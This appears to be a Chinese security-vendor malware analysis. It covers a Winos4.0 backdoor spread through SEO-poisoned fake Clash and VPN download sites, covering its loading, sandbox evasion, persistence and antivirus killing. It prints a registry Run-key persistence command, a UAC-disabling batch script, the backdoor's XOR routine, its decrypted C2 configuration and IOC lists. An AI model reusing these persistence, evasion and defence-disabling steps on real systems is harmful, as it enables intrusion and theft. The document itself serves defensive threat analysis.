你在“漫游”看世界,他们却在小窗口里窥视着你【上】

文摘   2024-10-15 18:05   广东  

国庆假期期间,想必大家的朋友圈又是被各种出国游刷屏,巴厘岛潜水、普吉岛冲浪、印度尼西亚看bromo火山……对于一些没有机会出国旅行的朋友来说,通过浏览国际网站,也成为了他们了解世界的一种方式。然而,你有没有想过,你的漫游行为,可能被人盯上了,这些人正通过这些软件的后门窥探你的隐私,甚至窃取你的个人信息。

今天要分享的是在日常安全研究狩猎中最新发现的一份恶意样本,通过层层追踪及样本分析,我们大致掌握了该组织的攻击手法及样本加载的过程。

一、本文关注点

  • 攻击者利用SEO提高搜索排名,短时间内曾排名到百度clash搜索的前三名

  • Winos4.0后门的使用以及RPC相关手法的出现,与银狐有较高相似度

  • 一些有趣的反沙箱手法,以及利用Restart Manager对防病毒软件进行削弱

  • 在归因分析过程中,关联到同源的Operation Dragon Breath后门,在下篇中分享
通过对百度的及时反馈,目前已经对该站点添加了安全中心提醒,访问类似网站时请仔细甄别;

二、文件释放流程简图

样本整个加载和释放的过程都非常简单,还是主流的白加黑手法,但攻击者非常喜欢通过lnk文件执行命令;结合释放的squic.ss文件解密后门组件,若EDR防御削弱失败会释放另一组持久化组件;

三、加载过程

初始样本运行后首先进行一系列的内存分配和字符定义,加密的固定Payload部分实际是内存dll加载器,SignalChromeElf定义为入口函数,通过外层加载器调用内存dll;

加载完成后进行base16解密,将Payload十六进制字符还原成字节;

检查PE文件标识,申请内存并写入Payload数据,重定位修复PE文件;

修复完成后,遍历导出表函数,循环匹配SignalChromeElf函数名称;

通过自实现函数935230完成函数指针获取,完成反射调用;

进入SignalChromeElf函数内部,此处是加载器代码和一系列的环境检查和防御绕过操作;

1、权限提升

验证当前程序令牌是否具有管理员权限,尝试以管理员权限启动;

若程序权限不足,10002AC0函数会尝试执行runas命令进行权限提升;

2、环境验证

首先创建互斥体并对进程名称验证,若存在任意一个,则视为加载器或后门已经运行,退出当前进程;

建立网络连接,请求百度域名,解析返回包中的Date字段并完成时间戳格式转换;

通过HEAD方法请求,得到互联网当前时间(攻击者喜欢通过各种合法域名或接口代替NTP时间获取)

若与本地存在较大时间差则弹窗退出程序,主要用于对抗沙箱加速;

3、后门及持久化

首先分别创建几个长度不同的随机字符串,用于后续命名后续存放相关组件的目录;

进行预定义路径字符拼接和创建,包括C盘根目录、ProgramData、Public子目录;

创建过程中会释放squic.ss过渡文件,此文件中包含lnk和部分程序数据,通过再次读取释放完整后门组件;

在C:\ProgramData\Mylnk中写入dick.lnk文件,通过COM接口调用wsShell对象来运行;

MachineID:desktop-c5udfqv、win-20240812dkl

后门组件所在的路径会创建1.lnk用于注册表持久化,运行完成后自动删除;

%windir%\system32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\Mylnk\dick.lnk" /f

4、防御削弱

此部分代码比较有趣,首先扫描360tray.exe杀软进程,若存在则会启动另一个已释放的名为vgc.exe的程序;

vgc.exe实际是一个仅会弹错误窗口的白进程,但后续会进行一系列操作来扫描这个窗口,并将窗口属性修改为隐藏样式;如果过程中此窗口被自动确认或者关闭,那么整个程序将停止运行(某些沙箱已经具备自动点击能力)

接着使用 Restart Manager 机制完成对360tray.exe进程的关闭(12.0及以下版本有效),此方法是为数不多的R3 Kill技术,属于API滥用;RM是Windows操作和优化系统资源的一种机制(详细参考Win32文档)

API调用序列:
RmStartSession-> RmRegisterResources-> RmGetList-> RmShutdown-> RmEndSession此技术常出现在勒索软件中,例如Conti、Lockbit、BlackSuit 等,用于解除正被应用程序占用的待加密文件;
首先创建一个新的Restart Manager会话,以Session的方式对资源进行操作,返回会话密钥;

使用RmRegisterResources函数,将杀毒软件或需要解锁的文件路径以资源形式注册到会话中;

注册完成后使用RmGetList获取结构体信息,同时注册表中也会新增部分Session信息,可考虑作为监控项;

最后调用RmShutdown函数来关闭所有与注册资源相关的进程,会话结束后注册表会自动清理;

5、防御绕过

如果RM关闭360杀软失败,会创建防火墙屏蔽规则并释放另一组Agicer.exe白加黑持久化组件;

首先增加两条策略用于关闭出入站流量,用于屏蔽本地杀软与云引擎的通信;

使用COM对象创建IHxHelpPaneServer接口,通过Execute方法调用白加黑进程启动后门,实现断链操作;

利用RPC接口重新注册并创建持久化任务,以绕过注册表拦截,后门程序启动后解除防火墙规则;

6、后门远控

白加黑组件运行后EduWebContainer.dll读取并解密Ensup.log得到Payload载荷;

载荷为Winos4.0的上线模块.dll,申请内存并调用同名SignalChromeElf函数运行;

Winos4.0是基于Gh0st后门的魔改版本,具有灵活的自定义配置和插件功能,配置代号如下:
|p1:地址1|o1:端口1|t1:通信1|p2:地址2|o2:端口2|t2:通信2|p3:地址3|o3:端口3|t3:通信3|dd:等待|cl:重连|fz:分组|bb:版本|bz:备注|jp:键盘|sx:沙箱|bh:保护|ll:流量|dl:入口|sh:守护|kl:傀儡|bd:特别|

通信协议

Winos的所有插件使用统一的协议,前4字节代表载荷大小,后10字节存储密钥,Param代表传递具体内容;
// 外层协议struct Packet{struct Header{PBYTE nBufLen;   // 载荷大小PBYTE password[10];  // 算法密钥}LPBYTE Param[0];   // 通信内容}
// 加密算法for (int i = 0, j = 0; i < (int)nSize; i++) {((char*)m_pPtr)[i] ^= (password[j++]) % 456 + 54;if (i % (10) == 0)j = 0;}

载荷完成初始化后,解密的C2配置如下:

|p1:154.213.71.4|o1:6666|t1:1|p2:154.213.17.4|o2:8888|t2:1|p3:154.213.71.4|o3:88|t3:1|dd:1|cl:1|fz:|

7、更新迭代

在后续迭代样本中,新增通过msi安装包程序调用加载器dll的手法,且为进一步伪装,内置正常的exe安装程序;

进一步加强了对Ensup.log的加密算法, 对文件内容进行块级异或解密;

在后门组件释放目录新增bat脚本,通过修改注册表禁用UAC;
@echo offreg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f echo UAC has been disabled. Please restart your computer for the changes to take effect.pause

四、组织归因

结合微步情报与我们的判断,此组织很可能属于银狐的一个新分支,攻击手法与历史样本对比有一定差距,且活动时间较短;在拓线分析过程中我们发现,同个跳转域名下的资源出现了Operation Dragon Breath(xxx-Q-27)组织样本,虽然手法不同,但不排除两个组织有一定关联性。

五、终端检测

微步的OneSEC具备COM断链攻击检测与串链还原,及威胁情报云端同步的能力;

六、情报分析

拓线过程中发现大量的高相似度后门,此类样本从8月开始出现,但很多变种类型实际未上传或公开;

可以通过Graph来下载标准STIX格式的情报信息。

https://www.virustotal.com/graph/g2e3b92a090654263bbf0a09294779dd8c61eceb9de554013965cd29a26b5c1c8

七、活跃IOC

  • 154.213.71.4
  • 154.26.210.70
  • 202.146.220.95
  • 7382cc5fb9894a1d23eee4f8f7e19494
  • 8d5d6bfe0000f45614808a0d30c62f79
  • 617cd6206a0745cd6aae92b09f8b4c2a
  • 820ed38e2e029516e35ae689df6bc385
  • 09a6aad885646cae85c53b69a11907bf
  • https://clash-apps[.]com
  • https://www.heimao-134[.]com/pCpHh33mb8
  • https://www.heimao-134[.]com/MIQpyvCGj5
  • https://www.heimao-134[.]com/MbKjIECsfb
  • https://www.heimao-134[.]com/4xJSKVzrUX
  • https://down.baofupay[.]bond/v2rayN-LLa.zip
  • https://mady.6yov49bw[.]icu/i4_setups_gw_cYdvI.zip
  • https://i4pc[.]top/i4Tools8_v8.28_Setup_x64.zip
  • https://softsdownsss.oss-ap-northeast-1.aliyuncs[.]com/aisi.msi
  • https://softs-downloads.oss-ap-southeast-1.aliyuncs[.]com/Clash.for.Windows.Setup.0.20.39.msi


顺丰安全应急响应中心
顺丰安全应急响应中心(SFSRC)官方微信
 最新文章